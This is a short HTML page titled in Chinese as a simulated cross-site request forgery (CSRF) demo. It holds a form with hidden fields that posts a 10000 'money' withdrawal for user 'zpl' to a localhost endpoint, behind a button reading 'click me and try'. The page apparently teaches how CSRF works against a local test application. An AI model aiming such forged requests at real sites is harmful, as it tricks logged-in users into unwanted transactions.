<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>模拟 CSRF 跨站请求伪造</title>
</head>
<body>

<form action="http://localhost/withdraw" method="post">
    <input type="hidden" name="name" value="zpl">
    <input type="hidden" name="money" value="10000">
    <input type="submit" value="点我试试看">
</form>

</body>
</html>